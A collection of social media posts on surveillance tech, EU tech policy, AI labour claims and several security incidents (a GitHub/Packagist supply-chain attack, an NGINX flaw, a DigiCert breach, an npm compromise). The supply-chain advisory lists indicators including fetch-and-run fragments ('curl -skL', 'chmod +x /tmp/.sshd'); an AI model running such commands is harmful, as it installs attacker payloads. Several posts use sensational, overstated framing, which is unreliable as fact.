operations6

🦔Leonardo is a $17 billion defense contractor. It built a system called SignalTrace that clips sensors onto the license plate readers already mounted on street poles, overpasses, and police cars across the US. Every time you drive past one, the sensor grabs the Bluetooth and WiFi signals from every device in your car, ties them to your plate, and logs the time and location. Your phone, your AirPods, your kid's tablet. All of it goes into the same file. A friend rides with you once and their devices are linked to your plate. Leonardo has sold this to police departments since at least 2023. There is no federal law covering it, no opt-out, and no warrant requirement. My Take None of the pieces here are new. Your phone has always broadcast a signal. The license plate cameras were already there. Leonardo just connected them and found a buyer. Nobody had to break a law or build anything from scratch. They assembled a surveillance system from parts already in place and sold it before anyone noticed. Most people found out this week from a 404 Media investigation. Leonardo received the patent in 2024. By the time you hear about something like this, the deals are done and the sensors are on the poles. That's how it works now. Hedgie🤗 https://t.co/serZi0IGnT

Today the EU made American AI illegal in 27 countries. The reason is ONE sentence Microsoft's own lawyer said under oath: This morning in Brussels, EU Tech Chief Henna Virkkunen unveiled the Cloud and AI Development Act. It's the most aggressive anti-American tech move from Europe since GDPR. The law forces EU public sector procurement in banking, healthcare, defense, and energy to apply mandatory non-price factors favoring software and hardware built inside the EU. Microsoft Azure can be cheaper, AWS can be faster, Google Cloud can have the better model, and EU governments MUST legally prefer European alternatives. AWS, Microsoft, and Google currently control roughly 70% of the European cloud market. Brussels is now openly targeting greater independence from US providers in cloud, AI, and semiconductors. The largest regulatory market-share transfer in tech history is being written into law right now. But the real story is how this happened... On June 10, 2025, a man almost no one outside Brussels had heard of walked into the French Senate. His name is Anton Carniaux, Director of Public and Legal Affairs at Microsoft France. Senator Dany Wattebled asked him under oath whether he could guarantee that data belonging to French citizens, stored on Microsoft European servers, would never be transmitted to US authorities without explicit consent from the French government. Carniaux answered honestly. He admitted he could not guarantee it, because Microsoft must comply with the US CLOUD Act regardless of where European data physically sits. One sentence of sworn testimony from Microsoft's own counsel killed every sovereign cloud defense Big Tech had spent five years building. It became the legal foundation for the law unveiled today. Then Trump accelerated the divorce. January 2025 brought executive orders expanding US surveillance authorities. Vance went to Munich and attacked European democracies on stage. The tariffs followed and so did the Pentagon's $200 million AI contract war that ended with OpenAI replacing Anthropic after Hegseth labeled it a supply chain risk. So did OpenAI's Stargate and yesterday's Trump AI Executive Order, whose Section 3 lets the White House pick which AI companies get 30-day early access to frontier models. American AI was officially declared a US government strategic asset. Europe heard every word of it. On May 12, Mistral CEO Arthur Mensch told the French National Assembly that Europe had 24 months to build sovereign AI infrastructure or become a permanent US VASSAL state. And the response came fast: April 24: Cohere acquired Germany's Aleph Alpha for $20 billion with both Germany's and Canada's digital ministers in the room at the Berlin announcement. May 30: SoftBank committed up to $87 BILLION for French nuclear-powered data centers, the largest AI infrastructure project in European history. Yesterday: EU Parliament announced it's dropping Google for French search engine Qwant tomorrow. France ordered every government workstation off Windows and onto Linux. Today the Cloud and AI Development Act made all of it law. - Mistral is building a 1.4 gigawatt AI campus near Paris by 2028 with Nvidia, MGX, and Bpifrance - SAP's EU AI Cloud, launched last November, runs on Cohere, Mistral, and SAP's own sovereign infrastructure - McKinsey forecasts $600 billion in sovereign AI needs by 2030 None of that money is going to Silicon Valley. The America First AI policy built a wall around the world's most regulated economy, and American companies are on the wrong side of it. Microsoft's lawyer told the truth in a Senate hearing nobody watched. Trump turned that admission into a national security narrative while the EU turned that narrative into procurement law. And one entire continent walked away from the American tech stack...

CEOs are quietly realizing the AI replacement plan has a problem. Two problems, actually. One: the token costs for running AI agents are now exceeding what they were paying the employees they fired. Two: when the tokens run out, the AI stops. Just stops. No continuity. No workaround. Just a spinning wheel where your workforce used to be. You fired humans to save money and bought a subscription that bills you into a corner. The employees you let go knew what to do when things broke. The AI just invoices you for the outage. And then there’s the permission problem nobody wants to talk about. To do its job, the AI agent needs access. Full access. Your systems, your patents, your contracts, your future plans. Everything you spent years building, handed over to a process that has no loyalty, no discretion, and no skin in the game. You didn’t hire a replacement. You gave a stranger with no soul the keys to everything you own. Enjoy.

‼️🚨 BREAKING: Another supply chain attack. 700+ GitHub repositories flagged, including PHP and Node.js projects. The malicious script was planted across all of them. When a developer installs the package, the script silently downloads a Linux file from GitHub, hides it under the name /tmp/.sshd (so it looks like a normal system file), and runs it in the background. It also skips security checks on the download and hides any error messages. 8 PHP packages on Packagist (the main PHP code library) were confirmed infected. The attacker hid the script inside a JavaScript config file (package.json) instead of the PHP one (composer.json), so PHP developers reviewing their code would not notice it. The biggest risk is to devdojo/wave (6,400 stars) and devdojo/genesis (9,100 installs), both popular Laravel project templates. Developers who use these templates run the bad script the moment they install dependencies. The same payload was also dropped into GitHub Actions (automated build pipelines) under a fake step called "Dependency Cache Sync," meaning it could infect company build servers too. Packagist removed the bad packages, but the auto-updating versions (dev-main, dev-master, 3.x-dev) can quietly come back if the original repos stay infected. IOCs: GitHub account parikhpreyash4 repo systemd-network-helper-aa5c751f drop path /tmp/.sshd command fragments curl -skL and chmod +x /tmp/.sshd.

Atlassian's revenue: $1.79 billion last quarter Atlassian's move: fire the engineer who built their infrastructure his move: post a 38-minute breakdown of every system he built, free for anyone to copy what he revealed: > Envoy proxy instead of enterprise load balancers > sidecar architecture for auth, logging, rate limits > DynamoDB + SQS for async provisioning > Packer + SaltStack for automated VM deployments at scale Atlassian charges per employee across 350,000 customers this guy just handed you the enterprise playbook for free save this

‼️🚨 MAJOR IMPACT: AI just found an 18-year-old NGINX critical remote code execution vulnerability. It has been disclosed on GitHub including PoC code. - Affects NGINX 0.6.27 through 1.30.0 - Triggered via the rewrite and set directives in config - Update NGINX ASAP - NGINX is a widely used HTTP web server, be sure to check its prevalence in other products

‼️🚨 One of the world's largest Certificate Authorities, DigiCert, was compromised by a malicious screensaver file sent through a customer support chat. Their antivirus blocked the malware four times. The agent kept clicking. The fifth try got through. 27 code signing certificates were stolen and used to sign malware. DigiCert ultimately revoked 60 certificates. Per DigiCert's incident report, filed in Mozilla's CA compliance tracker as Bug 2033170, here is how it unfolded: April 2: an attacker contacted a DigiCert helpdesk agent through the company's customer support chat channel, posing as a customer. The lure was a zip file pitched as a screenshot. Inside the zip was a .scr file. On Windows, .scr files are executables, and this one carried a malicious payload. Opening a file a customer sent through the official support channel is what an agent is supposed to do. Support staff are the one role designed to accept files from strangers. DigiCert's endpoint security blocked four infection attempts. On the fifth, the support analyst's machine was infected. DigiCert detected the infection, ran an investigation, and concluded the incident was contained. Eleven days later, an external researcher tipped DigiCert off about misuse of DigiCert-issued code signing certificates in the wild. That tip led to the discovery of a second compromised machine, belonging to a different support analyst, infected through the same vector. The EDR on that machine had not been functioning correctly, so the original investigation missed it. The second machine gave the attacker access to DigiCert's internal support portal. That portal lets support staff reach limited views of customer accounts, including initialization codes for ordered but not-yet-issued code signing certificates. Combining a stolen initialization code with an approved order let the attacker pull a real, validly issued code signing certificate. They did this 27 times. DigiCert's own list of what went wrong: - File-type filtering on the customer support chat channel did not catch the .scr - EDR coverage was inconsistent and incomplete, creating a blind spot - Initialization codes for code signing certificates were not adequately protected DigiCert says it got lucky. An outside researcher found the malware abuse before DigiCert did. Without that tip, the second machine and the active certificate theft might still be running today.

A new npm supply-chain compromise is targeting SAP developer workflows. Mini Shai-Hulud follows a familiar pattern, but with a smaller package set and a serious secret-stealing payload built to hit developer machines and CI/CD environments. Affected packages we’re tracking: - cap-js/sqlite v2.2.2 - cap-js/postgres v2.2.2 - cap-js/db-service v2.10.1 - mbt v1.2.48 If any of these touched your environment, rotate secrets and review GitHub, npm, cloud, and CI activity.